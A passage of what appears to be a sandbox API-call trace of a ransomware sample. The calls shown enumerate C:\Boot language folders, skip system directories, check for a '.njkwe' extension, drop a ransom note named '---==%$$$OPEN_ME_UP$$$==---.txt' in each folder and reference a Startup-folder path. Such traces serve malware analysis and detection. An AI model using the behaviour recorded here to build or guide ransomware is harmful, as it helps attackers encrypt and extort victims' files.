pszDest="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui") returned 33 [0065.146] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.146] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.146] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.146] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.146] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.147] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.147] FindClose (in: hFindFile=0xc19ea0 | out: hFindFile=0xc19ea0) returned 1 [0065.147] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.147] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\pl-pl\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.148] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.149] CloseHandle (hObject=0x428) returned 1 [0065.149] GetProcessHeap () returned 0xbe0000 [0065.149] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.149] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0065.149] lstrcmpiW (lpString1="pt-BR", lpString2="Windows") returned -1 [0065.149] lstrcmpiW (lpString1="pt-BR", lpString2="$Recycle.bin") returned 1 [0065.149] lstrcmpiW (lpString1="pt-BR", lpString2="System Volume Information") returned -1 [0065.149] lstrcmpiW (lpString1="pt-BR", lpString2="Program Files") returned 1 [0065.150] lstrcmpiW (lpString1="pt-BR", lpString2="Program Files (x86)") returned 1 [0065.150] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0065.150] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0065.150] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0065.150] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\pt-BR", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.150] GetProcessHeap () returned 0xbe0000 [0065.150] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.150] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\*") returned 19 [0065.150] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a360 [0065.150] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.150] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.150] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.150] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.150] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.150] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\.") returned 19 [0065.150] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.150] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.150] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.150] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.150] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.150] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.150] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.150] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\..") returned 20 [0065.150] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.150] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.150] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.150] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.150] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.150] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.150] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.150] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.151] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0065.151] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.151] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.151] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.151] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.151] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.151] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.151] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.151] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.151] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.151] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.151] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.151] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui") returned 33 [0065.151] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.151] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.151] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.151] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.151] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.151] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.151] FindClose (in: hFindFile=0xc1a360 | out: hFindFile=0xc1a360) returned 1 [0065.151] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.151] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\pt-br\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.153] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.154] CloseHandle (hObject=0x428) returned 1 [0065.154] GetProcessHeap () returned 0xbe0000 [0065.154] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.154] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0065.154] lstrcmpiW (lpString1="pt-PT", lpString2="Windows") returned -1 [0065.154] lstrcmpiW (lpString1="pt-PT", lpString2="$Recycle.bin") returned 1 [0065.154] lstrcmpiW (lpString1="pt-PT", lpString2="System Volume Information") returned -1 [0065.154] lstrcmpiW (lpString1="pt-PT", lpString2="Program Files") returned 1 [0065.154] lstrcmpiW (lpString1="pt-PT", lpString2="Program Files (x86)") returned 1 [0065.154] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0065.154] lstrcmpW (lpString1="pt-PT", lpString2=".") returned 1 [0065.155] lstrcmpW (lpString1="pt-PT", lpString2="..") returned 1 [0065.155] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\pt-PT", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.155] GetProcessHeap () returned 0xbe0000 [0065.155] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.155] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\*") returned 19 [0065.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0065.155] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.155] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.155] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.155] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.155] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.155] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\.") returned 19 [0065.155] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.155] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.156] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.156] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.156] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.156] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.156] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.156] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\..") returned 20 [0065.156] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.156] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.156] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.156] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.156] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.156] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.156] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.156] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.156] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0065.156] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.156] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.156] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.156] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.156] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.156] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.156] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0065.156] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.156] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0065.156] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0065.156] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.156] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui") returned 33 [0065.156] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".njkwe") returned 0x0 [0065.156] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.156] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0065.157] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0065.157] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.157] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0065.157] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0065.157] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.157] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\pt-pt\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0065.192] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0065.193] CloseHandle (hObject=0x428) returned 1 [0065.193] GetProcessHeap () returned 0xbe0000 [0065.193] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0065.193] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0065.193] lstrcmpiW (lpString1="qps-ploc", lpString2="Windows") returned -1 [0065.193] lstrcmpiW (lpString1="qps-ploc", lpString2="$Recycle.bin") returned 1 [0065.193] lstrcmpiW (lpString1="qps-ploc", lpString2="System Volume Information") returned -1 [0065.193] lstrcmpiW (lpString1="qps-ploc", lpString2="Program Files") returned 1 [0065.193] lstrcmpiW (lpString1="qps-ploc", lpString2="Program Files (x86)") returned 1 [0065.193] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc") returned 20 [0065.193] lstrcmpW (lpString1="qps-ploc", lpString2=".") returned 1 [0065.193] lstrcmpW (lpString1="qps-ploc", lpString2="..") returned 1 [0065.193] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\qps-ploc", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0065.193] GetProcessHeap () returned 0xbe0000 [0065.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0065.193] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc\\*") returned 22 [0065.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\qps-ploc\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19d20 [0065.194] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.194] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.194] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.194] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.194] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.194] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc\\.") returned 22 [0065.194] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.194] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0065.194] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.194] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.194] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.194] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.194] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.194] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\qps-ploc\\..") returned 23 [0065.194] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.194] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.194] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", 